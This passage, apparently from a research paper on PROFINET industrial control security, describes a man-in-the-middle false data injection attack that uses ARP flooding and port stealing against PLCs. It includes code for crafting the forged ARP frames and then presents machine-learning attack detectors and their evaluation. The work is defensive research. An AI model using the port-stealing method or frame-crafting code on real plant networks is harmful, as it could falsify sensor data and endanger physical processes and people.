In order to guarantee real-time synchronicity in data transmission, certain layers of the OSI model have been omitted in PROFINET IO (PNIO), as illustrated in Fig. 3, which results in lower-overhead communication flows. Hence, as shown in Fig.
4, in the real-time structure the dissection of a frame consists only of the Ethernet header and the PROFINET application layer, which is specified as follows:
a) Frame-ID: indicates the type of the frame, which is set to 0x8000 for cyclic real-time data.
b) IO Data: sensor measurements and actuator signals are referred to as IO Data.
c) IO Data Status: represents the status of a given variable in the frame.
d) Cycle Counter: an incremental value, which is incremented at the source, with an error-checking purpose.
e) Data Status: indicates the validity of the entire packet.

18 Courtesy of profinetuniversity.com

FIGURE 4. PROFINET IO real-time packet structure.

In the IO module, the data cycle update time, which is denoted by dt, can be set based on the system requirements from 2 to 512 msec, and represents the rate of data exchange between the IO module and the PLC. In the developed testbed, given the slow behavior of the TE process, this value is set to dt = 512 msec, which implies that 4 data samples are communicated in each full cycle (2 seconds). Fig. 5 shows the cycle counter corresponding to dt = 512 msec.

FIGURE 5. Cycle counters corresponding to dt = 512 msec.

IV. CYBER ATTACK INJECTION
In this section, our methodology for injecting cyber attacks on the developed testbed is presented. Generally, different protocols enable various attack surfaces such as the Data Integrity (DI) attack (e.g., manipulating sensor measurements) and Denial-of-Service (DoS), which causes disruption of the communication flow among entities. In an ICS architecture, cyber attacks can be categorized into two general types, namely configuration and operational attacks. In the configuration attack, the malicious hacker targets the configuration protocols of the ICS, and consequently gets access to full control of the system.
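The RT frame layout of Fig. 4 can be illustrated with a short parser. The byte offsets below follow the usual PROFINET RT convention (EtherType 0x8892, a 2-byte Frame-ID after the Ethernet header, the IO data, then the 2-byte cycle counter and status bytes at the tail); the MAC addresses and payload are hypothetical, and this is a sketch rather than a capture from the testbed:

```python
import struct

PN_ETHERTYPE = 0x8892  # EtherType assigned to PROFINET RT frames

def parse_rt_frame(frame: bytes):
    """Dissect a PROFINET RT class-1 frame (illustrative layout)."""
    dst, src = frame[0:6], frame[6:12]
    ethertype = struct.unpack(">H", frame[12:14])[0]
    if ethertype != PN_ETHERTYPE:
        raise ValueError("not a PROFINET RT frame")
    frame_id = struct.unpack(">H", frame[14:16])[0]
    # The tail trails the IO data: cycle counter (2 bytes),
    # data status (1 byte), transfer status (1 byte).
    io_data = frame[16:-4]
    cycle_counter, data_status, transfer_status = struct.unpack(">HBB", frame[-4:])
    return {"frame_id": frame_id, "io_data": io_data,
            "cycle_counter": cycle_counter, "data_status": data_status}

# Build a toy frame: Frame-ID 0x8000 (cyclic RT data), 4 bytes of IO data.
frame = (b"\x00\x0e\x8c\x00\x00\x01"        # destination MAC (hypothetical)
         + b"\x00\x0e\x8c\x00\x00\x02"      # source MAC (hypothetical)
         + struct.pack(">H", PN_ETHERTYPE)
         + struct.pack(">H", 0x8000)
         + b"\x12\x34\x56\x78"              # raw IO data
         + struct.pack(">HBB", 42, 0x35, 0))
info = parse_rt_frame(frame)
```

Because the frame carries no transport-layer header, a sniffer sitting on the switched segment can locate the raw IO data directly from these fixed offsets, which is what the attack in Section IV exploits.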
On the other hand, in the operational attacks, the malicious hacker mainly targets the operational communication protocol, such as the PROFINET IO real-time data, in which critical field data are transferred. For this cyber attack to take place, it is assumed that:
(i) The hacker has field-level access to the IO module and PLCs.
(ii) The hacker has knowledge of the physical system, implying that he/she is aware of what is being transmitted from the sensors and what is being transferred to the actuators.
In [34], the authors exploit a vulnerability of the PROFINET Discovery and Basic Configuration Protocol (DCP) to inject DoS attacks through port stealing against the application relation between the IO Controller and the IO Device. This type of cyber attack is not designed to be stealthy and has a higher probability of detection. An early attempt at false data injection through port stealing is presented in [35], although the developed attacks are not implemented on a real testbed. In this paper, based on the structure and features of PROFINET, a false data attack injected into the PROFINET IO real-time data through the man-in-the-middle (MITM) structure is validated on the developed testbed. This is mainly achieved by utilizing the ARP, in which the port of the victim on the shared medium (such as a switch) is stolen and the hacker acts as a man-in-the-middle in the closed-loop system that can modify the sensor measurements that are sent to the PLC. The PROFINET IO devices do not have any endpoint security functionality [36], which makes cyber attacks feasible once a malicious hacker has physical access to a device or its network connections. One of the most effective and damaging cyber attacks on the PROFINET IO devices is the MITM cyber attack.
The MITM cyber attack is implemented in our developed testbed by utilizing the port stealing methodology. In the port stealing attack, the switch MAC table is compromised such that the hacker's MAC address is registered in place of the victim's. Therefore, the intended port of the I/O module is stolen by the hacker, and consequently he/she can transmit false data to the PLCs. Port stealing is an active cyber attack which allows a hacker to sniff packets in a switched network as well as to modify packets by injecting new packets. This cyber attack targets the Application Relationship between the IO Controllers and the IO devices. Successful port stealing requires the hacker to synchronize with the real-time data communication and establish a race condition. The complete port stealing strategy is developed as follows:

ARP Flooding: First, an ARP packet is constructed by setting the packet destination and source MAC addresses to the hacker MAC and the victim MAC, respectively. Subsequently, by injecting a high flow rate of ARP packets into the switch, the intended victim port is stolen. As shown in Figs. 6 and 7, the MAC table of the switch is modified after the ARP flooding, and the MAC address of the hacker is set as the MAC address of the IO module in the MAC address table.

Receiving Data: In this step, the hacker receives data from the victim and modifies the sensor readings according to his/her knowledge of the process. The data received by the hacker is the raw IO data from the PROFINET IO real-time packet, as depicted in Fig. 4.

FIGURE 6. Data exchange configuration before the ARP flooding.

FIGURE 7. Data exchange configuration after the ARP flooding.

Next, the hacker needs to map the raw IO data into actual sensor readings in order to be able to modify them precisely, so that the modification results in the desired effect on the system.
Here the assumption is that the hacker has knowledge of the physical process and the control system, and can therefore map the raw IO data to the actual sensor readings. Therefore, the hacker will be able to choose values that are not easily detectable by the operator, and thus a stealthy cyber attack will be realized and accomplished.

Forwarding the Manipulated Data: In this step, the main MITM cyber attack is implemented, whereby the hacker re-crafts the received frames and forwards the modified frames back to the victim. However, the received frames cannot simply be forwarded back to the network due to the existence of the cycle counter in the frame. There exists a threshold for the number of missing packets per cycle, and its value can be set inside the TIA Portal tool. Therefore, in order to overcome this issue, the re-crafted packets are sent in a full cycle. Moreover, as the hacker and the IO modules are simultaneously sending data to the PLC, a race condition is established between them, in which the behavior of the system depends on the sequence or timing of events. With respect to Fig. 5, the race condition occurs if the hacker can send the false data between the state transitions, so that the false data crafted by the hacker arrives at the victim before the actual data. The significance of the hacker winning the race condition is that the hacker is then capable of injecting false measurement data into the system. However, this injection has to be sustained, ideally at every, or practically at most, state transitions for the hacker to remain successful in winning the race condition. After winning the race condition, the hacker can receive the RTC1 frames which contain the IO Data variables (process data).
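The ARP flooding step above amounts to repeatedly emitting an ARP reply whose Ethernet source MAC is the victim's, so that the switch re-learns the victim's MAC on the hacker's port. A minimal frame-construction sketch follows; all MAC and IP addresses are hypothetical, and actually sending the frame would require a privileged raw socket (e.g., AF_PACKET on Linux), which is deliberately omitted here:

```python
import struct

def arp_frame(dst_mac: bytes, src_mac: bytes,
              sender_ip: bytes, target_ip: bytes) -> bytes:
    """Craft an ARP reply whose Ethernet source MAC is the victim's,
    so the switch re-learns the victim MAC on the sender's port."""
    eth = dst_mac + src_mac + struct.pack(">H", 0x0806)   # EtherType = ARP
    # htype=1 (Ethernet), ptype=0x0800 (IPv4), hlen=6, plen=4, opcode=2 (reply)
    arp = struct.pack(">HHBBH", 1, 0x0800, 6, 4, 2)
    arp += src_mac + sender_ip + dst_mac + target_ip
    return eth + arp

# Hypothetical addresses: destination = hacker MAC, source = victim (IO module) MAC,
# matching the ARP flooding step described above.
hacker_mac = bytes.fromhex("0a0000000001")
victim_mac = bytes.fromhex("0a0000000002")
frame = arp_frame(hacker_mac, victim_mac,
                  b"\xc0\xa8\x00\x02", b"\xc0\xa8\x00\x01")
# Flooding would then mean transmitting many copies of `frame` in a tight
# loop through a raw socket, stealing the victim's switch port.
```

Note how the forged association lives entirely in the Ethernet source field: the switch's learning behavior, not the ARP payload itself, is what gets exploited.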
In order to increase the success probability of the cyber attack, the PLC should continually receive the mal-crafted data rather than the original data; therefore, the hacker should send each mal-crafted data item for more than one cycle. Fig. 8 depicts the entire process of implementing the false data injection cyber attack on the PROFINET. It should be noted that, due to the precise timing and synchronicity that are required in order to inject data into the PLC, we have used the C language and the libpcap library in order to make this methodology possible. The libpcap library works by capturing all the frames that are coming out of the physical medium into the data link layer. The alternative to using the libpcap library is to use a packet capture software such as Wireshark; however, for our purposes this is not suitable, since Wireshark captures and saves packets offline.

FIGURE 8. False Data Injection (FDI) through the port stealing.

One important point regarding the implemented cyber attack is that if the hacker continues the port stealing for a long duration, this will disrupt the communication between the PLC and the IO. In this case, the attack becomes a Denial-of-Service (DoS) attack, which can be easier for operators to detect. By stopping the port stealing step after a given time duration, such as 1 sec, the attacker is able to start the frame manipulation without disrupting the communication.

V. CYBER ATTACK DETECTION (CAD) SCHEME
In order to detect cyber attacks in our developed testbed, several machine learning-based detection strategies are proposed and implemented. As shown in Fig. 9, the cyber attack detection scheme is divided into three main steps, namely, (a) pre-processing, (b) main scheme, and (c) post-processing.

A. PRE-PROCESSING
In order to have a dataset with zero mean and unit variance (standardization), data normalization is performed.
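This standardization step amounts to a z-score transform fitted on the healthy training data and then applied to incoming test points. A minimal numpy sketch (the data values are illustrative):

```python
import numpy as np

class Standardizer:
    """Zero-mean, unit-variance scaling fitted on healthy training data."""
    def fit(self, X):
        self.mean = X.mean(axis=0)
        self.std = X.std(axis=0)
        self.std[self.std == 0] = 1.0   # guard against constant sensors
        return self

    def transform(self, X):
        return (X - self.mean) / self.std

X_train = np.array([[1.0, 10.0], [3.0, 14.0], [5.0, 18.0]])
scaler = Standardizer().fit(X_train)
Z = scaler.transform(X_train)   # each column now has mean 0 and variance 1
```

Fitting on the attack-free data only (and reusing the same mean and standard deviation at test time) matters: otherwise an attack in the test stream would shift the normalization statistics themselves.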
The key feature of data normalization is that it boosts the learning speed and conditions the algorithm accordingly. Moreover, there are several available techniques for data normalization, chosen based on the nature/requirements of the algorithm itself.

B. MAIN SCHEMES
Broadly speaking, anomaly detection schemes can be divided into five main categories, namely (1) linear, (2) proximity-based, (3) probabilistic, (4) outlier ensembles, and (5) neural networks [7]. Consequently, in order to provide a comprehensive comparative study and evaluation, the following schemes belonging to different categories are chosen:
Linear: Principal Component Analysis (PCA) and One-Class Support Vector Machines (OCSVM).
Proximity-Based: Local Outlier Factor (LOF) and k-Nearest-Neighbors (kNN).
Outlier Ensembles: Isolation Forest (IF).

1) PRINCIPAL COMPONENT ANALYSIS (PCA)
Principal Component Analysis (PCA) [37] is a method widely used to determine dominant subspaces in datasets based on the eigenvectors of the covariance matrix, which are designated as the principal components. An anomaly detection technique can be developed based on variations from the nominal dominant subspaces in the dataset. Generally, the use of major components indicates global deviations from the majority of results, whereas the use of minor components may suggest smaller local deviations. Indeed, as illustrated in Algorithm 1, by performing the Singular Value Decomposition (SVD) over the normalized data, the eigenvalues and eigenvectors can be determined. Moreover, by computing the PCA-reconstructed representation X̂ = X T T^T, the approximated value (X̂) can be obtained. Therefore, by computing the maximum Euclidean distance between the normalized training data and the approximated one in the training set, the threshold value can be determined.
Consequently, for a testing data point (D), if the distance between the instance and the corresponding approximated value of that instance is above the given threshold value, then the instance is considered and classified as a cyber attack.

2) ONE-CLASS SUPPORT VECTOR MACHINES (OCSVM)
In the one-class support vector machine, a semi-supervised anomaly detection approach, the aim is to determine a hypersphere in the feature space with the minimum radius that contains all or most of the data points corresponding to the healthy operation of the system [38]. The hypersphere has two main parameters, namely its radius R_T and its center a, which are obtained by solving an optimization problem as explained in Algorithm 2. Once these parameters are obtained through the training stage, for each test data point D one can compute the distance between the data point and the hypersphere center a, and if this distance is greater than R_T,

FIGURE 9. The proposed data-driven cyber attack detection methodology, where r(t) denotes the decision flag corresponding to the real-time data point x(t).

Algorithm 1: Principal Component Analysis (PCA)
Training:
Input: X - training data; p - number of components to keep for the PCA transformation.
Output: threshold Tr
1: Calculate the SVD of the training data (X)
2: Construct the transformation matrix T by selecting the p dominant eigenvectors
3: Calculate the PCA-reconstructed representation, X̂ = X T T^T
4: Find the Euclidean distance between X̂ and X, E = distance(X̂, X)
5: Set the threshold as Tr = max(E)
Testing:
Input: D - test data; Tr.
Output: test data flag r
1: Calculate the PCA-reconstructed representation of the testing data, D̂ = D T T^T
2: Calculate the Euclidean distance between D̂ and D, e = distance(D̂, D)
3: if e < Tr then
4:   D is normal, r = 1.
5: else
6:   D is abnormal, r = 0.
7: end

then the point is classified as an anomaly; otherwise, it is assigned as healthy data. The only two hyper-parameters for the OCSVM are C and σ, where C controls the influence of the slack variables in the optimization process and can be obtained from C = 1/(νN), where ν represents the trade-off between the overfitting and the generalization accuracy, and σ is the kernel coefficient.

3) k-NEAREST-NEIGHBORS (kNN)
The k-nearest-neighbor global unsupervised anomaly detection scheme is a simple way to determine irregularities, and is not to be mistaken for the kNN classification scheme [39].

Algorithm 2: One-Class Support Vector Machine (OCSVM)
Training:
Input: x_i - training data (i ∈ {1, 2, 3, ..., N}); C.
Output: the hypersphere centre a and its radius R_T.
Optimize α_i, i = 1, ..., N in
  min L(α) = Σ_{i,j=1}^{N} α_i α_j K(x_i, x_j) − Σ_{i=1}^{N} α_i K(x_i, x_i)
subject to 0 < α_i < C and Σ_{i=1}^{N} α_i = 1,
where K(x_i, x_j) = exp(−||x_i − x_j||² / (2σ²)).
Compute the centre (a) and the radius (R_T) of the hypersphere from:
  a = Σ_{i=1}^{N} α_i x_i
  R_T² = max_k [ K(x_k, x_k) − 2 Σ_{i=1}^{N} α_i K(x_k, x_i) + Σ_{i,j=1}^{N} α_i α_j K(x_i, x_j) ]
Testing:
Input: D - test data; the hypersphere centre a and its radius R_T.
Output: test data flag r
Compute R(D) = K(D, D) − 2 Σ_{i=1}^{N} α_i K(D, x_i) + Σ_{i,j=1}^{N} α_i α_j K(x_i, x_j)
if R(D) > R_T² then
  D is abnormal, r = 1.
else
  D is normal, r = 0.
end

As the name suggests, the kNN scheme specializes in global anomalies and is unable to identify local anomalies. In this approach, the hyper-parameter k denotes the number of nearest neighbors.
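Stepping back, the PCA-based detector of Algorithm 1 can be sketched compactly in numpy; the synthetic data and the choice p = 1 are illustrative, not the testbed's settings:

```python
import numpy as np

def pca_train(X, p):
    """Algorithm 1, training: fit a p-dimensional subspace on healthy data
    and set the threshold to the largest reconstruction error."""
    # SVD of the (already standardized) training matrix; the rows of Vt
    # are the principal directions.
    _, _, Vt = np.linalg.svd(X, full_matrices=False)
    T = Vt[:p].T                            # transformation matrix (n_features x p)
    X_hat = X @ T @ T.T                     # PCA-reconstructed representation
    E = np.linalg.norm(X - X_hat, axis=1)   # per-sample Euclidean distance
    return T, E.max()                       # threshold Tr = max(E)

def pca_test(d, T, Tr):
    """Algorithm 1, testing: r = 1 (normal) if the reconstruction error
    stays below the threshold, r = 0 (abnormal) otherwise."""
    d_hat = d @ T @ T.T
    return 1 if np.linalg.norm(d - d_hat) < Tr else 0

rng = np.random.default_rng(0)
# Healthy data living close to a one-dimensional subspace of R^3.
X = np.outer(rng.normal(size=200), [1.0, 2.0, 0.5]) + 0.01 * rng.normal(size=(200, 3))
T, Tr = pca_train(X, p=1)
r_ok = pca_test(np.array([1.0, 2.0, 0.5]), T, Tr)     # lies on the subspace
r_bad = pca_test(np.array([5.0, -5.0, 5.0]), T, Tr)   # far off the subspace
```

Points consistent with the learned subspace reconstruct almost perfectly, while an injected value off the subspace produces a large residual and trips the threshold.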
Then, as illustrated in Algorithm 3, for each test data point D, the decision score a_score(D) is compared with the computed threshold to detect a cyber attack.

Algorithm 3 Nearest-Neighbor Algorithm
Training:
Input: x_i - training data (i in {1, 2, 3, ..., N}), k.
Output: Threshold Tr
1: for i = 1, ..., N do
2:   Compute the k nearest neighbors of x_i using the Ball-tree algorithm.
3:   Compute the decision score a_score(x_i) as the largest distance between x_i and its nearest neighbors.
4: end
5: Set the threshold as Tr = max_i (a_score(x_i))
Testing:
Input: D - test data, x_i - training data, Tr.
Output: Test data flag r
1: Compute the k nearest neighbors of D using the Ball-tree algorithm.
2: Compute the decision score a_score(D) as the largest distance between D and its nearest neighbors.
3: if a_score(D) > Tr then
4:   D is abnormal, r = 1.
5: else
6:   D is normal, r = 0.
7: end

4) LOCAL OUTLIER FACTOR (LOF)
The local outlier factor (LOF) approach [41] is the most well-known local anomaly detection algorithm. In this algorithm, the concept of local anomalies is utilized, where the LOF score is determined by comparing the Local Reachability Density (LRD) of the record with the LRDs of its k nearest neighbors, as illustrated in Algorithm 4. In this approach, first, for the test data point D and the training set X, the k-distance D_k(D) is defined as D_k(D) = d(D, x), x in X, where (a) there exist at least k data points x' in X such that d(D, x') <= d(D, x), and (b) there exist at most k - 1 data points x' in X such that d(D, x') < d(D, x), with d(D, x) denoting the distance between the points D and x, which can be computed using different norms. Next, the k-distance neighborhood N_k(D) is defined as follows:
  N_k(D) = { x in X | d(D, x) <= D_k(D) }.
It should be noted that the cardinality of N_k(D), denoted by |N_k(D)|, can in general be greater than k.
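Algorithm 3 can be sketched as below. A brute-force neighbor search replaces the paper's Ball-tree for clarity; the names are our own.

```python
import numpy as np

def kth_neighbor_distance(D, X, k):
    """a_score(D): distance from the test point D to its k-th nearest
    neighbor in X, i.e. the largest of the k neighbor distances."""
    d = np.sort(np.linalg.norm(X - D, axis=1))
    return d[k - 1]

def knn_train(X, k):
    """Threshold Tr = max training score. For a training point, d[0] is
    its own zero distance, so we look one neighbor further (d[k])."""
    scores = []
    for i in range(len(X)):
        d = np.sort(np.linalg.norm(X - X[i], axis=1))
        scores.append(d[k])
    return max(scores)

def knn_flag(D, X, k, Tr):
    """r = 1 (abnormal) if the score exceeds Tr, else r = 0 (normal)."""
    return 1 if kth_neighbor_distance(D, X, k) > Tr else 0
```

A point far from every training sample has a large k-th neighbor distance and is flagged as a global anomaly.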
Then, the reachability distance of D with respect to x in X is defined as
  R_k(D, x) = max{ d(D, x), D_k(x) }.

Algorithm 4 Local Outlier Factor (LOF) Algorithm
Input: x_i - training data, k, D - testing data
Output: Test data flag r
1: Find the k-distance neighborhood N_k(D)
2: Compute the Local Reachability Density (LRD): LRD(D) = |N_k(D)| / sum_{x in N_k(D)} R_k(D, x)
3: Compute LOF(D) = [ sum_{x in N_k(D)} LRD(x) / LRD(D) ] / |N_k(D)|
4: if LOF(D) > threshold then
5:   D is abnormal, r = 1.
6: else
7:   D is normal, r = 0.
8: end

Next, the Local Reachability Density LRD(D) and the Local Outlier Factor LOF(D) are obtained as explained in Algorithm 4. Finally, the test data point is classified as abnormal if LOF(D) > 1.

5) ISOLATION FOREST (IF)
The Isolation Forest (IF) scheme, which is an unsupervised machine learning technique [42], [43], is now used as the strategy for performing the cyber attack detection objective. The key advantages of IF with respect to other anomaly detection schemes are as follows: (I) the IF scheme does not utilize any distance or density measure to detect an anomaly, which eliminates the major computational cost of distance computations, and (II) it has a linear time-complexity with a constant training time and a minimal memory requirement [44]. These are two key features that are essential for online implementation of the IF for a real-time cyber attack detection process in industrial control systems. Cyber attack detection using the IF is performed in two stages, namely: (1) training, and (2) real-time testing. In the training phase, isolation trees are constructed by using sub-samples of the normal healthy system operational dataset. In the online testing phase, the real-time data are fed to the trained IF for performing the cyber attack detection objective.
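Algorithm 4 can be sketched in plain NumPy as follows, with brute-force neighbor search for clarity; this is an illustrative sketch, not the authors' implementation, and all names are our own.

```python
import numpy as np

def lof(D, X, k):
    """Local Outlier Factor of a test point D w.r.t. training set X,
    following Algorithm 4. Values well above 1 indicate an anomaly."""
    def nn(p, self_idx=None):
        """N_k(p) (k nearest training indices) and D_k(p)."""
        d = np.linalg.norm(X - p, axis=1)
        order = np.argsort(d)
        if self_idx is not None:
            order = order[order != self_idx]   # skip the point itself
        nbrs = order[:k]
        return nbrs, d[nbrs[-1]]

    # Precompute D_k(x) for every training point
    kdist = {i: nn(X[i], i)[1] for i in range(len(X))}

    def lrd(p, nbrs):
        # LRD(p) = |N_k(p)| / sum_{x in N_k(p)} R_k(p, x)
        s = sum(max(np.linalg.norm(X[j] - p), kdist[j]) for j in nbrs)
        return len(nbrs) / s

    nbrs_D, _ = nn(D)
    lrd_D = lrd(D, nbrs_D)
    lrd_sum = sum(lrd(X[j], nn(X[j], j)[0]) for j in nbrs_D)
    # LOF(D) = (sum_x LRD(x) / LRD(D)) / |N_k(D)|
    return lrd_sum / (lrd_D * len(nbrs_D))
```

A point inside the training cloud scores near 1, while a distant point has a much lower local density than its neighbors and scores far above 1.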
In the training phase, given the training set X = {x_1, ..., x_N}, x_i in R^d, corresponding to the normal operation of the system, m different isolation trees T_i, i = 1, ..., m, are constructed by recursively splitting a sub-sample X_i of X until all the data points in X_i are isolated. For each isolation tree T_i, the sub-sample X_i is randomly selected without replacement from X using two hyper-parameters, n as the number of data points used to train each tree, and f as the number of features that are selected for training that isolation tree, i.e., X_i = {x_{i,1}, ..., x_{i,n}}, x_{i,l} in R^f. Each tree is specified by a set of nodes that are indexed by the pair (j, k), where j denotes the depth of the node and k is the index of that node at the given depth, with 0 <= k <= 2^j - 1. Each internal

16248 VOLUME 9, 2021 M. Noorizadeh et al.: Cyber-Security Methodology for a Cyber-Physical Industrial Control System Testbed

node (j, k) has two children, (j+1, 2k) and (j+1, 2k+1), and the root node is denoted by (0, 0).
The isolation forest, as shown in Algorithm 5, operates based on the concept of binary recursive splitting of the feature space R^d by each isolation tree T_i, with a randomly selected split feature q in {1, ..., f} and a split value p chosen within the range of the selected feature. The scheme is initiated with the root node (0, 0) and the training set X_i, and the training set for each node, denoted by X_i^{j,k}, is obtained recursively as follows. At node (j, k), the data points are split into two subsets
  X_i^{j+1, 2k} = { x_{i,l} in X_i^{j,k}, l = 1, ..., n | x_{i,l}^q < p }  and
  X_i^{j+1, 2k+1} = { x_{i,l} in X_i^{j,k}, l = 1, ..., n | x_{i,l}^q >= p },
until all samples are isolated, where x_{i,l}^q corresponds to the q-th element of x_{i,l}. In each splitting step at node (j, k), two children nodes (j+1, 2k) and (j+1, 2k+1) with the corresponding training datasets X_i^{j+1, 2k} and X_i^{j+1, 2k+1} are generated.
These can be internal nodes, if it is still possible to split the corresponding subset, or external nodes, corresponding to the last node in a branch, when the size of the data subset of that region is 1 or the maximum tree depth is reached. In the case of an internal node, the data subsets X_i^{j+1, 2k} and X_i^{j+1, 2k+1} are further split until an external node is reached.

Algorithm 5 TrainT_i(X_i)
Input: X_i - input data
Output: an isolation tree T_i
1: Initialization: the root node with index (0, 0) and the training set X_i^{0,0} = X_i. Set j = k = 0.
2: if X_i^{j,k} cannot be divided then
3:   The node (j, k) is designated as an external node and no division is performed for this node.
4: else
5:   The node (j, k) is designated as an internal node
6:   Randomly select a feature q in {1, ..., f}
7:   Randomly select a splitting value p between the minimum and the maximum values of the feature q in X_i^{j,k}
8:   Set X_i^{j+1, 2k} = { x_{i,l} in X_i^{j,k}, l = 1, ..., n | x_{i,l}^q < p }
9:   Set X_i^{j+1, 2k+1} = { x_{i,l} in X_i^{j,k}, l = 1, ..., n | x_{i,l}^q >= p }
10:  Recursion: go to step 2 and continue splitting the nodes (j+1, 2k) and (j+1, 2k+1)
11: end

The general concept of the cyber attack detection strategy utilizing the IF is justified and rationalized by the fact that, in the process of splitting the data, the cyber attacks are different from the normal points and can be isolated closer to the root of the tree. Consequently, they have a shorter path from the root. In the real-time cyber attack detection process, for each new sample measurement D, the path length in the i-th tree T_i, denoted by h_i(D), is obtained by counting the number of edges from the root node to an external node as the sample D is passed through the isolation tree T_i.
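Algorithm 5 and the path-length computation can be sketched as below; this is a minimal illustrative version (plain Python, no sub-sampling across features), and the function names and the dictionary tree representation are our own.

```python
import random

def train_tree(X, depth=0, max_depth=10):
    """Grow one isolation tree (Algorithm 5): pick a random feature q
    and a random split value p in its range, partition, and recurse
    until a subset is of size 1 or the maximum depth is reached."""
    if len(X) <= 1 or depth >= max_depth:
        return {"size": len(X)}                    # external node
    q = random.randrange(len(X[0]))                # random split feature
    lo = min(x[q] for x in X)
    hi = max(x[q] for x in X)
    if lo == hi:                                   # cannot be divided
        return {"size": len(X)}
    p = random.uniform(lo, hi)                     # random split value
    left = [x for x in X if x[q] < p]
    right = [x for x in X if x[q] >= p]
    return {"q": q, "p": p,
            "left": train_tree(left, depth + 1, max_depth),
            "right": train_tree(right, depth + 1, max_depth)}

def path_length(tree, x, depth=0):
    """h_i(x): edges from the root to the external node x falls into."""
    if "size" in tree:
        return depth
    child = tree["left"] if x[tree["q"]] < tree["p"] else tree["right"]
    return path_length(child, x, depth + 1)
```

Averaging the path length over a forest of such trees gives h_avg; anomalous points tend to be isolated closer to the root and therefore get shorter average paths than points inside the normal cluster.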
Consequently, the average path length over all trees is obtained as follows:
  h_avg(D) = (1/m) sum_{i=1}^{m} h_i(D),   (1)
Next, a score value is assigned to the new sample measurement D as
  s(D) = 2^{-h_avg(D)/H},   (2)
where H denotes the average expected path length of the trees in the forest and is given by
  H = 2 ln(n - 1) + 1.2 - 2(n - 1)/N,   (3)
with N denoting the total number of data points in X. Finally, the cyber attack is detected by using the detection threshold delta as follows:
  r = { 0 if s(D) > delta, 1 if s(D) <= delta.   (4)

C. POST-PROCESSING
As illustrated in Fig. 9, in the post-processing stage, an observation window of the last W data points is used to perform the cyber attack detection decision-making process. Specifically, if 80% (chosen based on the mesh search) of the W flags r(tau), tau in [t - W, t], corresponding to the last W data points are isolated as anomalies by the anomaly detection scheme, then the current data point x(t) is identified as a cyber attack. The main goal of the window-based post-processing scheme is to reduce the number of false alarms and to produce a smoother decision-making process.

VI. PERFORMANCE EVALUATION AND ASSESSMENT
In this section, the evaluation and validation of our proposed cyber attack detection schemes are provided and demonstrated for the developed TE testbed infrastructure.

A. DATASET
As previously indicated, the proposed methodologies of this work are demonstrated by using real datasets generated from the implemented ICS testbed. The generated dataset consists of 25 variables, such that 16 variables correspond to the sensor measurements and 9 variables correspond to the actuator signals. Two types of datasets are generated: initially, the testbed was run for almost 72 hours under the normal condition (that is, cyber attack free) for generating the training set of size (25 x 96827) (after removing the initial transient behavior), i.e., N = 96827.
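The window-based post-processing step can be sketched as follows (an illustrative sketch; the generator-style interface and names are our own, while W and the 80% ratio follow the text):

```python
from collections import deque

def make_window_detector(W, ratio=0.8):
    """Window-based post-processing: the current sample is declared a
    cyber attack only if at least `ratio` of the last W per-sample
    anomaly flags are 1, suppressing isolated false alarms."""
    flags = deque(maxlen=W)
    def update(r):
        flags.append(r)
        return 1 if len(flags) == W and sum(flags) >= ratio * W else 0
    return update
```

A single spurious flag never triggers an alarm; only a sustained run of anomalous flags within the window does, which also smooths the decision signal.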
Subsequently, the testbed was run several times subject to different cyber attack scenarios and different cyber attack gateways and points. Towards this end, false data injection (FDI) cyber attacks are injected into the communication channels between the I/O modules and the corresponding PLC by scaling the sensor measurement data online with the scaling factor lambda. Four different cyber attack scaling scenarios are considered, lambda in {0.98, 0.96, 0.94, 0.92}, with a cyber attack duration of two hours. For instance, PLC 3 receives four measurements, namely y12, y14, y15, and y17, and the cyber attack on PLC 3 can be modeled as:
  y_i^a = lambda y_i,  i = 12, 14, 15, 17,   (5)
where y_i^a corresponds to the i-th measurement under cyber attack. Figure 10 illustrates the FDI on y12 and y15 in PLC 3 for all four scaling cyber attack scenarios. These four cyber attack scenarios are repeated for all five PLCs, and hence 20 different cyber attack scenarios are injected. Consequently, the test dataset, of size (25 x 128159), has been generated such that 68113 out of the 128159 samples correspond to cyber attacks and the rest are healthy data. The sampling time for data logging was 2 seconds for both datasets.

FIGURE 10. Measurements under cyber attacks for PLC3.

B. TRAINING OF PROPOSED METHODOLOGIES
The training of the proposed schemes and structures is performed by using open-source machine learning libraries for the Python programming language, namely the Scikit-learn library and the PyOD toolbox [7], [45]. Furthermore, the training is performed using 8-fold cross-validation, such that each structure is trained 8 times. Moreover, the hyper-parameters of each scheme are set based on a mesh search around the recommended values in PyOD [7].
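The scaling attack of Eq. (5) can be sketched as below (an illustrative sketch; the function name is our own, and the channel indices follow the PLC 3 example):

```python
import numpy as np

def inject_fdi(y, indices, lam):
    """False data injection of Eq. (5): scale the attacked sensor
    channels by lambda, y_i^a = lambda * y_i, leaving the rest intact."""
    ya = y.copy()
    ya[indices] = lam * ya[indices]
    return ya
```

For example, with lambda = 0.96 only the channels listed in `indices` are scaled, which mimics the man-in-the-middle modification of the measurements sent to the PLC.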
C. PERFORMANCE EVALUATION METRICS
The confusion matrix is a form of contingency table with two dimensions, identified as True and Predicted, and a set of classes corresponding to both dimensions, as presented in Table 5. The following detection and classification performance metrics are derived from the confusion matrix [46]:

TABLE 5. The confusion matrix.

1) ACCURACY
Accuracy specifies the closeness of the measurements to a specific category/class and is computed as:
  Accuracy = (TP + TN) / (TP + FP + TN + FN)   (6)
2) RECALL
Recall is the True Positive Rate (TPR) and is computed as:
  TPR = TP / (TP + FN)   (7)
3) PRECISION
Precision is the Positive Predictive Value (PPV) and is computed as:
  PPV = TP / (TP + FP)   (8)
4) F1 SCORE
The F1 score is the harmonic average of the precision and recall; it is at its best at a value of 1, implying perfect precision and recall, and is computed by:
  F1 = 2 * PPV * TPR / (PPV + TPR)   (9)
It should be noted that the main aim of this section is to present a quantitative comparison study of the various cyber attack detection schemes using the real-time data generated by the developed testbed.

D. COMPARATIVE TESTING AND VALIDATION RESULTS
In this subsection, a quantitative comparison study of various cyber attack detection schemes is presented. As previously indicated, the field data are collected in real time from the PLC's local cloud. Therefore, by implementing the cyber attack detection schemes on the process data in real time, the status of the data can be determined online. Table 6 summarizes the efficiency of the proposed schemes. As illustrated in Table 6, the IF has the worst performance over the provided datasets, due to high oscillation in the detection signal (a high number of false negative alarms), while it has the fastest training time in comparison with the other techniques. Moreover, the OCSVM scheme has achieved quite promising results as compared to the other methods.
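Eqs. (6)-(9) can be computed directly from the confusion-matrix counts, as in this small sketch (the function name is our own):

```python
def metrics(tp, fp, tn, fn):
    """Detection metrics of Eqs. (6)-(9) from the confusion matrix."""
    accuracy = (tp + tn) / (tp + fp + tn + fn)    # Eq. (6)
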